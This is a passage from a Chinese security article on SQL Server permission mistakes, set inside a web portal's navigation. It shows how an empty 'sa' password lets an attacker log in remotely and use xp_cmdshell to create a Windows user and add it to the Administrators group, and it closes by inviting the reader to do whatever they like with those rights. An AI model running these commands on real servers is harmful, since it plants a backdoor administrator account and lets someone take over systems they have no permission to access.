对联 ·故事 ·史海钩沉 ·人物档案 ·地方风俗 ·谚语大全 ·讽刺与幽默 · 赚钱 · 法律 · 在线教研 · 会员中心 · 心理测试 · 魔鬼词典 · 顺口溜
 
主页特效 网页特效 百家姓
娱乐 歇后语 绕口令 脑筋急转弯
 
谚语 谜语 名言 邮政编码
便民 酒方 验方 偏方 站长工具  
 
算命 风俗 手相 爱情
女孩 音乐 面相 星座 血型
 
饮食 穴道 偏方 医药
生活 软件 硬件 解梦 高考



   JS特效



实用工具
便民服务 加密解密
 
魅力高密 民间故事 Flash教程 PS教程 最新国内新闻
新华字典 黄道吉日 英语园地  万年历 Html2anycode
  首页 | 美图 | 短信 | 安全 | 校园 | 网站 | 游戏 | UFO | 文秘 | 生活 | 信息技术 | 论文 | 人生 | 情感 | 日记
返回首页
当前位置: 主页 > 网络安全 >

sqlserver用户权限分配问题(5)

时间:2010-01-15 13:44来源:未知 作者:大方巷 点击:
三、权限划分不当的危害 在新安装的SQL Server后,如果sa帐户,密码就为空,而且这个密码是SQL Server安全模块成员,享有最高的管理控制权,那么我们就可
  

三、权限划分不当的危害

  在新安装的SQL Server后,如果"sa"帐户,密码就为空,而且这个密码是SQL Server安全模块成员,享有最高的管理控制权,那么我们就可以用查询器或者OSQL登陆到对方的计算机上,前提是对方的数据库中  xp_cmdshell stored procedure“扩展存储过程” 存在,默认是有的,(能让  你这么容易的登陆上估计也不可能删除的)然后运行下面的命令:

  Xp_cmdshell "net user hacker 123456 /ADD"

  (增加一个名字为hacker密码为123456的用户)

  然后在:

  Xp_cmdshell "net localgroup Administrators hacker /ADD"

  (给刚才增加的hacker用户,添加到Administrators组中)

  这样攻击者就成功的在SQL SERVER上增加了一个windows用户,而且有最高权限,

  然后做什么呢?这个问题自己想吧,有了最高权限,想做什么就做什么吧。

 

===================
欢迎访问盼盼的家园(www.panpan.org)

顶一下
(1)
50%
踩一下
(1)
50%
------分隔线----------------------------
最新评论 查看所有评论
发表评论 查看所有评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 密码: 验证码:
赞助商位置
推荐内容
杂七杂八